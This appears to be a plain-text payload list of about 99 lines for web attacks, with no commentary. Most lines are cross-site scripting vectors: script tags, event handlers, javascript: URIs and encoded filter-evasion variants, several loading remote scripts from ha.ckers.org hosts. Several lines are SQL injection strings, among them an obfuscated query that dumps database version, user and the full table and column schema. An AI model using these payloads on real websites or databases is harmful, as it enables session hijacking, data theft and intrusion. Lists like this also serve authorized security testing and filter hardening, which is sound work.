99 lines
6.6 KiB
Plaintext
99 lines
6.6 KiB
Plaintext
<script>alert(1)</script>
|
|
<scRipt>alErt(1)</scrIpt>
|
|
<img src=x onerror=alert(1)>
|
|
<script type=vbscript>MsgBox(0)</script>
|
|
a'or 2=2--
|
|
<IMG SRC=javascript:alert("XSS")>
|
|
<IMG SRC=JaVaScRiPt:alert("XSS")>
|
|
<BODY ONLOAD=alert("XSS")>
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
<IMG SRC=" javascript:alert("XSS");">
|
|
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
|
|
<BODY BACKGROUND="javascript:alert("XSS")">
|
|
<IMG DYNSRC="javascript:alert("XSS")">
|
|
<INPUT TYPE="image" DYNSRC="javascript:alert("XSS");">
|
|
<BGSOUND SRC="javascript:alert("XSS");">
|
|
<br size="&{alert("XSS")}">
|
|
<LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>
|
|
<LINK REL="stylesheet" HREF="javascript:alert("XSS");">
|
|
<IMG SRC="vbscript:msgbox("XSS")">
|
|
<IMG SRC="mocha:[code]">
|
|
<IMG SRC="livescript:[code]">
|
|
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert("XSS");">
|
|
<IFRAME SRC=javascript:alert("XSS")></IFRAME>
|
|
<FRAMESET><FRAME SRC=javascript:alert("XSS")></FRAME></FRAMESET>
|
|
<TABLE BACKGROUND="javascript:alert("XSS")">
|
|
<DIV STYLE="background-image: url(javascript:alert("XSS"))">
|
|
<DIV STYLE="behaviour: url("http://xss.ha.ckers.org/exploit.htc");">
|
|
<DIV STYLE="width: expression(alert("XSS"));">
|
|
<STYLE>@im\port"\ja\vasc\ript:alert("XSS")";</STYLE>
|
|
<IMG STYLE="xss: expre\ssion(alert("XSS"))">
|
|
<STYLE TYPE="text/javascript">alert("XSS");</STYLE>
|
|
<XML SRC="javascript:alert("XSS");">
|
|
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert("XSS");}</SCRIPT><"
|
|
<SCRIPT SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
|
|
<IMG SRC="javascript:alert("XSS")"
|
|
<SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
|
|
<SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
|
|
<SCRIPT a=">" "" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><SCRIPT "a=">"" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
|
|
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
|
|
<A HREF=http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D>link</A>
|
|
<A HREF=ht://www.google.com/>link</A>
|
|
<A HREF=http://google.com/>link</A>
|
|
<A HREF=http://www.google.com./>link</A>
|
|
<A HREF="javascript:document.location="http://www.google.com/"">link</A>
|
|
<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
|
|
<BASE HREF="javascript:alert("XSS");//">
|
|
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
|
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
|
<IMG SRC=# onmouseover="alert("xxs")">
|
|
<IMG SRC= onmouseover="alert("xxs")">
|
|
<IMG onmouseover="alert("xxs")">
|
|
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
|
|
<img src=x onerror="javascript:alert('XSS')">
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
<IMG SRC="javascript:alert("XSS");">
|
|
<IMG SRC="jav	ascript:alert("XSS");">
|
|
<IMG SRC="jav
ascript:alert("XSS");">
|
|
<IMG SRC="jav
ascript:alert("XSS");">
|
|
<IMG SRC="  javascript:alert("XSS");">
|
|
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
|
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
|
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
|
|
<SCRIPT SRC=//ha.ckers.org/.j>
|
|
<IMG SRC="javascript:alert("XSS")"
|
|
<iframe src=http://ha.ckers.org/scriptlet.html <
|
|
\";alert("XSS");//
|
|
</script><script>alert("XSS");</script>
|
|
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
|
|
<a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>
|
|
<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>
|
|
<marquee/onstart=confirm(2)>
|
|
<table background="javascript:alert(1)"></table>
|
|
"/><marquee onfinish=confirm(123)>a</marquee>
|
|
<svg/onload=prompt(1);>
|
|
<isindex action="javas&tab;cript:alert(1)" type=image>
|
|
<marquee/onstart=confirm(2)>
|
|
/*!00000concat*/(0x63726561746f723a2064705f6d6d78,0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d353e44622056657273696f6e203a20,version(),0x3c62723e44622055736572203a20,user(),0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select%20(@x)%20/*!00000from*/%20(select%20(@x:=0x00),(select%20(0)%20/*!00000from*/%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=/*!00000concat*/(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x))
|
|
<object%00something allowScriptAccess=always data=//0me.me/demo/xss/flash/normalEmbededXSS.swf?
|
|
0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
|
|
1 AND (select DCount(last(username)&after=1&after=1) from users where username=ad1min)
|
|
1 AND (select DCount(last(username)&after=1&after=1) from users where username='ad1min')
|
|
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
|
|
<details ontoggle=alert(1)>
|
|
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
|
|
<body style="height:1000px" onwheel="[DATA]">
|
|
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]">
|
|
<body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
|
|
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">
|
|
<body style="height:1000px" onwheel="alert(1)">
|
|
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
|
|
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
|
|
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
|
|
?<input type="search" onsearch="aler\u0074(1)">
|
|
<details ontoggle=alert(1)>
|